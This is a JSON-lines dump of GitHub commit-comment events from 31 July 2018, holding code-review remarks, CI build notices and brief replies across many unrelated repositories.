{"id":"8045250407","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29907302,"position":7,"line":7,"path":"parser.py","commit_id":"f775bb3e4c9d84d67f20a6a9f8211ac46201ed4e","created_at":"2018-07-31T16:31:37Z","updated_at":"2018-07-31T16:31:37Z","author_association":"NONE","body":"Для \"приватных\" полей и методов используется одинарное подчеркивание. В основном, двойное подчеркивание используется чтобы избежать проблем при наследовании. Это конечно допустимо, на твое усмотрение. "}},"created_at":"2018-07-31T16:31:37Z"}
{"id":"8045250751","type":"CommitCommentEvent","actor":{"login":"adampbeardsley"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29907304,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T16:31:41Z","updated_at":"2018-07-31T16:31:41Z","author_association":"COLLABORATOR","body":"Time averaging the F-domain output won't work because those signals are zero mean. I just listened to a talk by Larry D'Addario, and he briefly mentioned the idea of distributing different time samples to different x blocks (he's doing FX). Would having multiple pipelines that take interleaved time gulps help at all?"}},"created_at":"2018-07-31T16:31:41Z"}
{"id":"8045252145","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"tpope/vim-fugitive"},"payload":{"comment":{"id":29907313,"position":null,"line":null,"path":null,"commit_id":"023ab8e4a6c65d9c6996880dd42168400b826ffe","created_at":"2018-07-31T16:31:56Z","updated_at":"2018-07-31T16:31:56Z","author_association":"NONE","body":"Indeed it is. Thanks! And thanks as always for the awesome Vim plugins."}},"created_at":"2018-07-31T16:31:56Z"}
{"id":"8045252647","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/tk-pantheon-d8-composer-project"},"payload":{"comment":{"id":29907314,"position":null,"line":null,"path":null,"commit_id":"2f5f656e1f5c02de053ba57af5d4fc73c1997413","created_at":"2018-07-31T16:32:03Z","updated_at":"2018-07-31T16:32:03Z","author_association":"OWNER","body":"Created multidev environment [tk-pantheon-d8-composer-project#ci-4](https://dashboard.pantheon.io/sites/0e5d3d11-9a4f-450c-b86e-575554655e6e#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-tk-pantheon-d8-composer-project.pantheonsite.io/)"}},"created_at":"2018-07-31T16:32:03Z"}
{"id":"8045254768","type":"CommitCommentEvent","actor":{"login":"Spectra456"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29907320,"position":7,"line":7,"path":"parser.py","commit_id":"f775bb3e4c9d84d67f20a6a9f8211ac46201ed4e","created_at":"2018-07-31T16:32:26Z","updated_at":"2018-07-31T16:32:26Z","author_association":"OWNER","body":"Благодарю"}},"created_at":"2018-07-31T16:32:26Z"}
{"id":"8045258877","type":"CommitCommentEvent","actor":{"login":"william-tran"},"repo":{"name":"wendorf/charts"},"payload":{"comment":{"id":29907336,"position":6,"line":62,"path":"stable/concourse/templates/web-deployment.yaml","commit_id":"1e1793c7e503b055cc3b1e5f17a66463862e6471","created_at":"2018-07-31T16:33:11Z","updated_at":"2018-07-31T16:33:11Z","author_association":"NONE","body":"Yeah I'd like to move all cmd line args to use env vars the implementation is much cleaner"}},"created_at":"2018-07-31T16:33:11Z"}
{"id":"8045262194","type":"CommitCommentEvent","actor":{"login":"KaiL4eK"},"repo":{"name":"KaiL4eK/ros_course"},"payload":{"comment":{"id":29907342,"position":null,"line":null,"path":null,"commit_id":"552214dde4bd2f29fa5fc13a4bd8002067d9c39c","created_at":"2018-07-31T16:33:47Z","updated_at":"2018-07-31T16:33:47Z","author_association":"OWNER","body":"Косяк с комментом, привел, короче, все топики к одному =)"}},"created_at":"2018-07-31T16:33:47Z"}
{"id":"8045267211","type":"CommitCommentEvent","actor":{"login":"20kdc"},"repo":{"name":"HybridDog/simple_robots"},"payload":{"comment":{"id":29907352,"position":null,"line":null,"path":null,"commit_id":"114df74f1981adaccb9e8c80e819b97da5f1e7ea","created_at":"2018-07-31T16:34:42Z","updated_at":"2018-07-31T16:34:42Z","author_association":"NONE","body":"Firstly, it's a cat, secondly, may I ask why you're sending images via commit comment that have been ANSI'd, zipped, and base64'd?"}},"created_at":"2018-07-31T16:34:42Z"}
{"id":"8045267990","type":"CommitCommentEvent","actor":{"login":"weishi10141993"},"repo":{"name":"HuguesBrun/cmssw"},"payload":{"comment":{"id":29907353,"position":null,"line":null,"path":null,"commit_id":"5fbffa0d0e930b85495ee7ecde5ab56375181aa9","created_at":"2018-07-31T16:34:50Z","updated_at":"2018-07-31T16:34:50Z","author_association":"NONE","body":"Hi @HuguesBrun \r\n\r\nI am studying a new HLT in [1] with collection \"hltGlbTrkMuonCandsNoVtx\", this seems not included in the collections in Line 80. Since the current TnP producer[2] is using this as input muon source, so I am not seeing any probes passing this HLT in [1]. \r\n\r\nShould I add this collection as a pull request?\r\n\r\nCheers,\r\nWei\r\n\r\n[1]\r\nhttps://cmswbm.cern.ch/cmsdb/servlet/HLTPath?PATHID=2111533\r\n[2]\r\nhttps://github.com/GLP90/Tnp94/blob/94_newSelector/test/zmumu/tp_from_aod_Data.py#L169"}},"created_at":"2018-07-31T16:34:50Z"}
{"id":"8045271117","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29907364,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-31T16:35:26Z","updated_at":"2018-07-31T16:35:26Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 236](https://teamcity.otenv.com/viewLog.html?buildId=9041419&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-31T16:35:26Z"}
{"id":"8045272418","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29907367,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-31T16:35:41Z","updated_at":"2018-07-31T16:35:41Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 51](https://teamcity.otenv.com/viewLog.html?buildId=9041434&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) is now running\n"}},"created_at":"2018-07-31T16:35:41Z"}
{"id":"8045274119","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29907373,"position":null,"line":null,"path":null,"commit_id":"ef12a0cfac21bad3b4228bbcfe0c492ea8531145","created_at":"2018-07-31T16:36:00Z","updated_at":"2018-07-31T16:36:00Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-339](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-339).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-339-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-31T16:36:00Z"}
{"id":"8045276695","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29907379,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-31T16:36:27Z","updated_at":"2018-07-31T16:36:27Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 51](https://teamcity.otenv.com/viewLog.html?buildId=9041434&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 7 Build time: 00:00:45"}},"created_at":"2018-07-31T16:36:27Z"}
{"id":"8045278720","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29907385,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-31T16:36:49Z","updated_at":"2018-07-31T16:36:49Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 236](https://teamcity.otenv.com/viewLog.html?buildId=9041419&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 34 Build time: 00:01:23"}},"created_at":"2018-07-31T16:36:49Z"}
{"id":"8045280394","type":"CommitCommentEvent","actor":{"login":"dev-harsh1998"},"repo":{"name":"characteress/overpowered"},"payload":{"comment":{"id":29907389,"position":null,"line":null,"path":null,"commit_id":"2346259f0a587427422e4ce5f9d6f23dc4341c94","created_at":"2018-07-31T16:37:08Z","updated_at":"2018-07-31T16:37:08Z","author_association":"NONE","body":"Please stop existing :)"}},"created_at":"2018-07-31T16:37:08Z"}
{"id":"8045281245","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29907394,"position":12,"line":12,"path":"parser.py","commit_id":"f775bb3e4c9d84d67f20a6a9f8211ac46201ed4e","created_at":"2018-07-31T16:37:16Z","updated_at":"2018-07-31T16:37:16Z","author_association":"NONE","body":"```py\r\nresponse = requests.get(self.__url).text\r\njson = json.loads(response)\r\n\r\n# Получаем\r\nlist(json.values())[1][day].get('lessons')\r\n# vs \r\nlist(self.decode().values())[1][day].get('lessons')\r\n```\r\n\r\nВелика ли разница?"}},"created_at":"2018-07-31T16:37:16Z"}
{"id":"8045282538","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29907396,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-31T16:37:29Z","updated_at":"2018-07-31T16:37:29Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 204](https://teamcity.otenv.com/viewLog.html?buildId=9041450&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-31T16:37:29Z"}
{"id":"8045283462","type":"CommitCommentEvent","actor":{"login":"Marsupial034"},"repo":{"name":"Marsupial034/Marsupial034.github.io"},"payload":{"comment":{"id":29907399,"position":30,"line":30,"path":"index.md","commit_id":"2067f59f4db49bf1ce33756e98907682f07c0f17","created_at":"2018-07-31T16:37:40Z","updated_at":"2018-07-31T16:37:40Z","author_association":"OWNER","body":"<li><a href=\"third\">Third post!\"</a></li>"}},"created_at":"2018-07-31T16:37:40Z"}
{"id":"8045285471","type":"CommitCommentEvent","actor":{"login":"dmex"},"repo":{"name":"processhacker/processhacker"},"payload":{"comment":{"id":29907404,"position":null,"line":null,"path":null,"commit_id":"fa6a25085b16a2c67d15667e39ad4d5de45ec9ab","created_at":"2018-07-31T16:38:02Z","updated_at":"2018-07-31T16:38:02Z","author_association":"MEMBER","body":"> Commits like this are created when\r\n\r\nI forget to git pull before git commit? 😄 "}},"created_at":"2018-07-31T16:38:02Z"}
{"id":"8045288973","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29907412,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-31T16:38:39Z","updated_at":"2018-07-31T16:38:39Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 204](https://teamcity.otenv.com/viewLog.html?buildId=9041450&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:09"}},"created_at":"2018-07-31T16:38:39Z"}
{"id":"8045291467","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29907423,"position":null,"line":null,"path":null,"commit_id":"31459ef8f044edf657e5c443bc41e30399cf90fb","created_at":"2018-07-31T16:39:07Z","updated_at":"2018-07-31T16:39:07Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-468](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-468).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-468-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-31T16:39:07Z"}
{"id":"8045293248","type":"CommitCommentEvent","actor":{"login":"joelgomes1994"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29907429,"position":43,"line":420,"path":"source/gameengine/Ketsji/KX_Mesh.cpp","commit_id":"59d33db590c41d98e8b04d17c80d2f3e355d8d62","created_at":"2018-07-31T16:39:27Z","updated_at":"2018-07-31T16:39:27Z","author_association":"NONE","body":"@panzergame No other error messages on console, however, replacing `__func__` by `\"\"` fixes the error and it builds correctly. Please, add this fix to master. Thanks. :smile: "}},"created_at":"2018-07-31T16:39:27Z"}
{"id":"8045293661","type":"CommitCommentEvent","actor":{"login":"up668172"},"repo":{"name":"up668172/acme-supermarket-test"},"payload":{"comment":{"id":29907431,"position":null,"line":null,"path":null,"commit_id":"477a86a982630dfe80137e844bf60fde294113c5","created_at":"2018-07-31T16:39:31Z","updated_at":"2018-07-31T16:39:31Z","author_association":"OWNER","body":"<img width=\"671\" alt=\"screen shot 2018-07-31 at 17 38 46\" src=\"https://user-images.githubusercontent.com/41954695/43473664-ac1b8ff0-94e8-11e8-858a-611eeee1993d.png\">\r\n"}},"created_at":"2018-07-31T16:39:31Z"}
{"id":"8045293768","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29907432,"position":null,"line":null,"path":null,"commit_id":"fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282","created_at":"2018-07-31T16:39:32Z","updated_at":"2018-07-31T16:39:32Z","author_association":"NONE","body":"159433798-Report-correct-Zone-Infiltration-and-Zone-Ventilation-Volume-Flow-Rates (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2956 of 2956 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T16:39:32Z"}
{"id":"8045295499","type":"CommitCommentEvent","actor":{"login":"jayich"},"repo":{"name":"CampbellGroup/common"},"payload":{"comment":{"id":29907439,"position":2,"line":79,"path":"lib/clients_py3/script_scanner_gui/tree_view/editors/duration_bandwidth_editor.py","commit_id":"504194d23f276b6d8bc8023eb477df0178f33a7d","created_at":"2018-07-31T16:39:52Z","updated_at":"2018-07-31T16:39:52Z","author_association":"CONTRIBUTOR","body":"Seeing this pass, possibly an error message should be returned."}},"created_at":"2018-07-31T16:39:52Z"}
{"id":"8045295784","type":"CommitCommentEvent","actor":{"login":"YaroST12"},"repo":{"name":"0ctobot/android_kernel_essential_msm8998"},"payload":{"comment":{"id":29907440,"position":null,"line":null,"path":null,"commit_id":"7ee717e7ae974def57e4b4f1c4963e5bfc9b46f4","created_at":"2018-07-31T16:39:55Z","updated_at":"2018-07-31T16:39:55Z","author_association":"CONTRIBUTOR","body":"Can you kidly stop removing my signatures from my commits? This isn't funny.\r\nhttps://github.com/YaroST12/MATA_Kernel/commit/77a34646a51857c35e19456efd91baa4e4292d82"}},"created_at":"2018-07-31T16:39:55Z"}
{"id":"8045300575","type":"CommitCommentEvent","actor":{"login":"jayich"},"repo":{"name":"CampbellGroup/common"},"payload":{"comment":{"id":29907459,"position":8,"line":84,"path":"lib/clients_py3/script_scanner_gui/tree_view/editors/duration_bandwidth_editor.py","commit_id":"504194d23f276b6d8bc8023eb477df0178f33a7d","created_at":"2018-07-31T16:40:48Z","updated_at":"2018-07-31T16:40:48Z","author_association":"CONTRIBUTOR","body":"Should something be printed here to indicate an error?"}},"created_at":"2018-07-31T16:40:48Z"}
{"id":"8045302707","type":"CommitCommentEvent","actor":{"login":"YaroST12"},"repo":{"name":"0ctobot/android_kernel_essential_msm8998"},"payload":{"comment":{"id":29907466,"position":null,"line":null,"path":null,"commit_id":"8d3004039cd082a721ee5365cf42c2f3016edba9","created_at":"2018-07-31T16:41:11Z","updated_at":"2018-07-31T16:41:11Z","author_association":"CONTRIBUTOR","body":"Same here.\r\nhttps://github.com/YaroST12/MATA_Kernel/commit/fedd3c8992260a8ed5f2284e421e3700651a2f74#diff-e3ee83126dc026f1b65acbaac87819d2\r\n"}},"created_at":"2018-07-31T16:41:11Z"}
{"id":"8045305768","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29907473,"position":null,"line":null,"path":null,"commit_id":"88fd8720fc0fbd7ad1162b1f7332a4c23f8ed74f","created_at":"2018-07-31T16:41:45Z","updated_at":"2018-07-31T16:41:45Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-58](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-58).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-58-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-31T16:41:45Z"}
{"id":"8045309050","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/tk-pantheon-d8-composer-project"},"payload":{"comment":{"id":29907490,"position":null,"line":null,"path":null,"commit_id":"44b069c77a112af16fe9865bf6b333f0273bc2cd","created_at":"2018-07-31T16:42:21Z","updated_at":"2018-07-31T16:42:21Z","author_association":"OWNER","body":"Created multidev environment [tk-pantheon-d8-composer-project#ci-5](https://dashboard.pantheon.io/sites/0e5d3d11-9a4f-450c-b86e-575554655e6e#ci-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-5-tk-pantheon-d8-composer-project.pantheonsite.io/)"}},"created_at":"2018-07-31T16:42:21Z"}
{"id":"8045315986","type":"CommitCommentEvent","actor":{"login":"indocomsoft"},"repo":{"name":"ex-aws/ex_aws_kms"},"payload":{"comment":{"id":29907508,"position":null,"line":null,"path":null,"commit_id":"825774577642ee667d74eb28d3544a67a47d7d85","created_at":"2018-07-31T16:43:35Z","updated_at":"2018-07-31T16:43:35Z","author_association":"NONE","body":"Hey there! Any timeline on when you will publish this relaxed version constraint on hex.pm?\r\n\r\nRight now I am trying to install `xml_builder` v2.0.0 which is blocked by `ex_aws` v2.0.2 as it depends on `xml_builder` \"~> 0.1.0\". This was removed in `ex_aws` v2.1.0, but I can't update to it because the current version of `ex_aws_kms` depends on `ex_aws` \"~> 2.0.0\""}},"created_at":"2018-07-31T16:43:35Z"}
{"id":"8045320117","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29907522,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-31T16:44:19Z","updated_at":"2018-07-31T16:44:19Z","author_association":"OWNER","body":"Checkmarx scan results 31 Jul 2018 19:44 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016CITEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1010011&projectid=10012\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-31T16:44:19Z"}
{"id":"8045322973","type":"CommitCommentEvent","actor":{"login":"smichaelsen"},"repo":{"name":"TYPO3/Fluid"},"payload":{"comment":{"id":29907530,"position":69,"line":106,"path":"src/Core/ViewHelper/AbstractConditionViewHelper.php","commit_id":"a67b31f9e6ecb015d0f47892fce46cf64110fd15","created_at":"2018-07-31T16:44:50Z","updated_at":"2018-07-31T16:44:50Z","author_association":"NONE","body":"> this method is the one to override and implement\r\nIt‘s in the comments for both methods. "}},"created_at":"2018-07-31T16:44:50Z"}
{"id":"8045328713","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29907546,"position":null,"line":null,"path":null,"commit_id":"a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77","created_at":"2018-07-31T16:45:50Z","updated_at":"2018-07-31T16:45:50Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2340 of 2340 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.26%25-green.png)</a>\n"}},"created_at":"2018-07-31T16:45:50Z"}
{"id":"8045333340","type":"CommitCommentEvent","actor":{"login":"bdaley"},"repo":{"name":"uconn/banner"},"payload":{"comment":{"id":29907563,"position":null,"line":null,"path":null,"commit_id":"c72e46b3e4b9b5d93bde0547d7c30c4b24e932d4","created_at":"2018-07-31T16:46:36Z","updated_at":"2018-07-31T16:46:36Z","author_association":"MEMBER","body":"🙌 "}},"created_at":"2018-07-31T16:46:36Z"}
{"id":"8045334427","type":"CommitCommentEvent","actor":{"login":"stefanpenner"},"repo":{"name":"testem/testem"},"payload":{"comment":{"id":29907570,"position":9,"line":157,"path":"lib/app.js","commit_id":"53777177054220c311879dd921e78003a7f0d49c","created_at":"2018-07-31T16:46:48Z","updated_at":"2018-07-31T16:46:48Z","author_association":"CONTRIBUTOR","body":"If 'on('timeout')` is invoked, I suspect we always want to log, and always want to set the `this.testSuiteTimedOut` boolean. Or is there another reason `timeout` would be invoked?"}},"created_at":"2018-07-31T16:46:48Z"}
{"id":"8045335797","type":"CommitCommentEvent","actor":{"login":"nihelharb"},"repo":{"name":"nihelharb/front"},"payload":{"comment":{"id":29907581,"position":null,"line":null,"path":null,"commit_id":"8729a27f220c2ee23cee096ab8469c979628f211","created_at":"2018-07-31T16:47:02Z","updated_at":"2018-07-31T16:47:02Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-31T16:47:02Z"}
{"id":"8045335911","type":"CommitCommentEvent","actor":{"login":"Rosielcarmo"},"repo":{"name":"Rosielcarmo/sptcover"},"payload":{"comment":{"id":29907584,"position":null,"line":null,"path":null,"commit_id":"8798b2cf7736024e523d001c45d456f445bc7a64","created_at":"2018-07-31T16:47:04Z","updated_at":"2018-07-31T16:47:04Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-31T16:47:04Z"}
{"id":"8045336192","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-catalog"},"payload":{"comment":{"id":29907586,"position":1,"line":1,"path":"models/admin_helper.js","commit_id":"789a91d7fcdf3eabe7a6db038c97e450542ada96","created_at":"2018-07-31T16:47:07Z","updated_at":"2018-07-31T16:47:07Z","author_association":"COLLABORATOR","body":"Looks like you still may be having problems with linting in your editor please run `yarn lint` before pushing commits to make sure you are meeting the eslint requirements."}},"created_at":"2018-07-31T16:47:07Z"}
{"id":"8045337881","type":"CommitCommentEvent","actor":{"login":"Rosielcarmo"},"repo":{"name":"Rosielcarmo/sptcover"},"payload":{"comment":{"id":29907588,"position":null,"line":null,"path":null,"commit_id":"8798b2cf7736024e523d001c45d456f445bc7a64","created_at":"2018-07-31T16:47:23Z","updated_at":"2018-07-31T16:47:23Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-31T16:47:23Z"}
{"id":"8045338486","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29907591,"position":null,"line":null,"path":null,"commit_id":"a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77","created_at":"2018-07-31T16:47:30Z","updated_at":"2018-07-31T16:47:30Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T16:47:30Z"}
{"id":"8045339440","type":"CommitCommentEvent","actor":{"login":"drsm"},"repo":{"name":"nginx/njs"},"payload":{"comment":{"id":29907592,"position":7,"line":1261,"path":"nginx/ngx_http_js_module.c","commit_id":"6cea6c6f1b5f7a36cf92a9aff9f68f658bd566cd","created_at":"2018-07-31T16:47:40Z","updated_at":"2018-07-31T16:47:40Z","author_association":"NONE","body":"typo? (NJS_ERROR)"}},"created_at":"2018-07-31T16:47:40Z"}
{"id":"8045343589","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29907603,"position":null,"line":null,"path":null,"commit_id":"5c8c4358cf02ad2a087229df3fbd532476dc9576","created_at":"2018-07-31T16:48:24Z","updated_at":"2018-07-31T16:48:24Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 63](https://teamcity.otenv.com/viewLog.html?buildId=9041535&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-31T16:48:24Z"}
{"id":"8045352089","type":"CommitCommentEvent","actor":{"login":"Viper2000XXL"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29907638,"position":null,"line":null,"path":null,"commit_id":"05d72f963d91c94518e6d08e2805a0a078c8af44","created_at":"2018-07-31T16:50:00Z","updated_at":"2018-07-31T16:50:00Z","author_association":"NONE","body":"This commit is causing Event SYSTEM_EVENT_STA_DISCONNECTED not to be fired! Even the WiFi-Event example in Arduino IDE is not working in case of Disconnect.  Lines 377 and 378 are the Problem - if you comment these lines out it is working again."}},"created_at":"2018-07-31T16:50:00Z"}
{"id":"8045353745","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29907640,"position":null,"line":null,"path":null,"commit_id":"5c8c4358cf02ad2a087229df3fbd532476dc9576","created_at":"2018-07-31T16:50:19Z","updated_at":"2018-07-31T16:50:19Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 63](https://teamcity.otenv.com/viewLog.html?buildId=9041535&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:54"}},"created_at":"2018-07-31T16:50:19Z"}
